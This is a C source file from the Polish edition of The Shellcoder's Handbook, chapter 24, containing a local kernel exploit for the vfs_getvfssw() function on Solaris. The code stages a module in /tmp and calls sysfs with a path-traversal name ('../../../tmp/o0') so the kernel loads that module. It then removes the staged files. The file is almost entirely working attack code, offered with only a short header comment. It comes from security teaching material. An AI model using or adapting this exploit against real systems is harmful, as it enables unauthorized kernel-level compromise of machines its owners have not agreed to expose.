/*

The Shellcoder's Handbook. Edycja polska
Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
Sinan Eren, Neel Mehta, Riley Hassell
Wydawnictwo Helion


Rozdzia 24
Wykorzystanie sabych punktw jdra
Eksploit funkcji vfs_getvfssw() w systemie Solaris

Komentarze i uwagi prosz przesya na adres jack@infosecinstitute.com 
lub za porednictwem witryny http://www.infosecinstitute.com 

*/



------------ o0o0.c ----------
#include <stdio.h>
#include <sys/fstyp.h>
#include <sys/fsid.h>
#include <sys/systeminfo.h>

/*int sysfs(int opcode, const char *fsname); */

int
main(int argc, char **argv)
{
  char modname[] = "../../../tmp/o0";
  char buf[4096];
  char ver[32], *ptr;
  int sixtyfour = 0;

    memset((char *) buf, 0x00, 4096);
    if(sysinfo(SI_ISALIST, (char *) buf, 4095) < 0) {
        perror("sysinfo");
        exit(0);
     }

     if(strstr(buf, "sparcv9"))
        sixtyfour = 1;
  
     memset((char *) ver, 0x00, 32);
     if(sysinfo(SI_RELEASE, (char *) ver, 32) < 0) {
        perror("sysinfo");
        exit(0);
     }
 
     ptr = (char *) strstr(ver, ".");
     if(!ptr) {
         fprintf(stderr, "can't grab release version!\n");
         exit(0);
     } 
     ptr++;
     
     memset((char *) buf, 0x00, 4096);
     if(sixtyfour)
       snprintf(buf, sizeof(buf)-1, "cp ./%s/o064 /tmp/sparcv9/o0", ptr); 
     else
       snprintf(buf, sizeof(buf)-1, "cp ./%s/o032 /tmp/o0", ptr);

     if(sixtyfour) 
        if(mkdir("/tmp/sparcv9", 0755) < 0) {
            perror("mkdir");
            exit(0);
        }

    system(buf);
 
    sysfs(GETFSIND, modname);
        //perror("hoe!");

   if(sixtyfour)
        system("/usr/bin/rm -rf /tmp/sparcv9");
     else
        system("/usr/bin/rm -f /tmp/o0");

}
